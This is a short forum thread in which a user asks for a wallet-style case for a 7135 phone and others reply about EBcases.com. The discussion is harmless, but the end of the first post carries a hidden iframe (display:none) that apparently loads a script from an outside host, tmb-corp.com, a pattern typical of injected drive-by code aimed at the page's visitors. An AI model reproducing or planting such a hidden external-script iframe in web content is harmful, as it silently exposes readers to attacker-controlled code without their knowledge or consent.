+ Reply to Thread

Wallet recommendation for 7135

I'm planning to purchase a 7135 (through Verizon) in the near future. It will replace my Palm VIIx for palm/internet functions. I currently use a slightly customized Palm wallet case as the VIIx's case; the idea was to integrate the Palm as a component of my wallet, which has worked quite well. I always have my wallet so there's one less thing to remember.

I'd like to do the same thing with the 7135. At first that sounds a little odd (who wants to talk into their wallet?) but since I don't expect to use the phone much that's fine.

Can anyone recommend a wallet for the 7135?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

No such thing exists at this time but you can recommend one. Go to EBcases.com and go to the recommended products section. They have a wide variety of cases and haven't made one for the 7135 but I'm sure they will in the future.

Administrator
    although EB cases makes some great products, there still needs to be some type of demand for this particular product...one request wont do...

im sure he will make a conventional case (holster type) for the 7135 though...